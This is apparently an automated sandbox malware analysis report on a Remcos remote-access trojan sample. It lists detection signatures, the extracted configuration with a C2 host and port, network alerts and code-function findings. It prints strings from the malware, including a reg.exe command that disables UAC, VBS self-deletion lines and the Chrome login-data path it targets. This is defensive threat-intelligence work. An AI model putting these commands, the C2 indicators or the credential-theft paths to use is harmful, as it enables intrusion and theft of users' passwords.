Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe

Overview

General Information

Sample name:1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
Analysis ID:1587333
MD5:90bf80022402e68248981833dcfacde0
SHA1:60b5b5973c52ed76af313681a6c24f264b88a3b4
SHA256:be4f15c4e0df6828dfcb3b91b22e77558bd02cb49afdd6089ff846651c5c6e98
Tags:base64-decodedexeuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Installs a global keyboard hook
Machine Learning detection for sample
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["juanosorio.loseyourip.com:1997:1"], "Assigned name": "09-01-25", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JLQBNY", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
      1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6ad08:$a1: Remcos restarted by watchdog!
        • 0x6b280:$a3: %02i:%02i:%02i:%03i
        1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeREMCOS_RAT_variantsunknownunknown
        • 0x64f94:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64f10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64f10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x65410:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x65a10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x65004:$str_b2: Executing file:
        • 0x65e4c:$str_b3: GetDirectListeningPort
        • 0x65800:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x65980:$str_b7: \update.vbs
        • 0x6502c:$str_b9: Downloaded file:
        • 0x65018:$str_b10: Downloading file:
        • 0x650bc:$str_b12: Failed to upload file:
        • 0x65e14:$str_b13: StartForward
        • 0x65e34:$str_b14: StopForward
        • 0x658d8:$str_b15: fso.DeleteFile "
        • 0x6586c:$str_b16: On Error Resume Next
        • 0x65908:$str_b17: fso.DeleteFolder "
        • 0x650ac:$str_b18: Uploaded file:
        • 0x6506c:$str_b19: Unable to delete:
        • 0x658a0:$str_b20: while fso.FileExists("
        • 0x65549:$str_c0: [Firefox StoredLogins not found]
        Click to see the 1 entries

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000001.00000002.3753688291.000000000228F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    Click to see the 10 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                        1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                          1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                          • 0x6ad08:$a1: Remcos restarted by watchdog!
                          • 0x6b280:$a3: %02i:%02i:%02i:%03i
                          1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                          • 0x64f94:$str_a1: C:\Windows\System32\cmd.exe
                          • 0x64f10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                          • 0x64f10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                          • 0x65410:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                          • 0x65a10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                          • 0x65004:$str_b2: Executing file:
                          • 0x65e4c:$str_b3: GetDirectListeningPort
                          • 0x65800:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                          • 0x65980:$str_b7: \update.vbs
                          • 0x6502c:$str_b9: Downloaded file:
                          • 0x65018:$str_b10: Downloading file:
                          • 0x650bc:$str_b12: Failed to upload file:
                          • 0x65e14:$str_b13: StartForward
                          • 0x65e34:$str_b14: StopForward
                          • 0x658d8:$str_b15: fso.DeleteFile "
                          • 0x6586c:$str_b16: On Error Resume Next
                          • 0x65908:$str_b17: fso.DeleteFolder "
                          • 0x650ac:$str_b18: Uploaded file:
                          • 0x6506c:$str_b19: Unable to delete:
                          • 0x658a0:$str_b20: while fso.FileExists("
                          • 0x65549:$str_c0: [Firefox StoredLogins not found]
                          Click to see the 7 entries

                          Sigma Signatures

                          Stealing of Sensitive Information

                          barindex
                          Sigma detected: Remcos
                          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, ProcessId: 7704, TargetFilename: C:\ProgramData\remcos\logs.dat

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-10T07:50:17.643480+010020365941Malware Command and Control Activity Detected192.168.2.749704179.15.136.61997TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-10T07:50:18.965560+010028033043Unknown Traffic192.168.2.749706178.237.33.5080TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-10T07:50:16.779873+010028349371A Network Trojan was detected192.168.2.7529071.1.1.153UDP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeAvira: detected
                          Found malware configuration
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeMalware Configuration Extractor: Remcos {"Host:Port:Password": ["juanosorio.loseyourip.com:1997:1"], "Assigned name": "09-01-25", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JLQBNY", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                          Multi AV Scanner detection for submitted file
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeReversingLabs: Detection: 71%
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeVirustotal: Detection: 64%Perma Link
                          Yara detected Remcos RAT
                          Source: Yara matchFile source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.3753688291.000000000228F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe PID: 7704, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for sample
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00432B45 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,1_2_00432B45
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_7cf015cf-6

                          Exploits

                          barindex
                          Yara detected UAC Bypass using CMSTP
                          Source: Yara matchFile source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe PID: 7704, type: MEMORYSTR

                          Privilege Escalation

                          barindex
                          Contains functionality to bypass UAC (CMSTPLUA)
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00406764 _wcslen,CoGetObject,1_2_00406764
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,1_2_0040B335
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,1_2_0040B53A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041B63A FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,1_2_0041B63A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0044D7F9 FindFirstFileExA,1_2_0044D7F9
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,1_2_004089A9
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00406AC2 FindFirstFileW,FindNextFileW,1_2_00406AC2
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,1_2_00407A8C
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,1_2_00408DA7
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00418E5F FindFirstFileW,FindNextFileW,FindNextFileW,1_2_00418E5F
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,1_2_00406F06

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2834937 - Severity 1 - ETPRO MALWARE Observed DNS Query to Abused DDNS (loseyourip .com) : 192.168.2.7:52907 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49704 -> 179.15.136.6:1997
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: juanosorio.loseyourip.com
                          Source: global trafficTCP traffic: 192.168.2.7:49704 -> 179.15.136.6:1997
                          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 179.15.136.6 179.15.136.6
                          Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                          Source: Joe Sandbox ViewASN Name: ColombiaMovilCO ColombiaMovilCO
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49706 -> 178.237.33.50:80
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00426302 recv,1_2_00426302
                          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                          Source: global trafficDNS traffic detected: DNS query: juanosorio.loseyourip.com
                          Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/WZ
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000692000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000692000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeString found in binary or memory: http://geoplugin.net/json.gp/C
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpc
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpn.net/
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpu
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpx

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Contains functionality to register a low level keyboard hook
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000001_2_004099E4
                          Installs a global keyboard hook
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeJump to behavior
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00415B5E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_00415B5E
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00415B5E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_00415B5E
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00415B5E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_00415B5E
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,1_2_00409B10
                          Source: Yara matchFile source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe PID: 7704, type: MEMORYSTR

                          E-Banking Fraud

                          barindex
                          Yara detected Remcos RAT
                          Source: Yara matchFile source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.3753688291.000000000228F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe PID: 7704, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                          Spam, unwanted Advertisements and Ransom Demands

                          barindex
                          Contains functionalty to change the wallpaper
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041BD82 SystemParametersInfoW,1_2_0041BD82

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
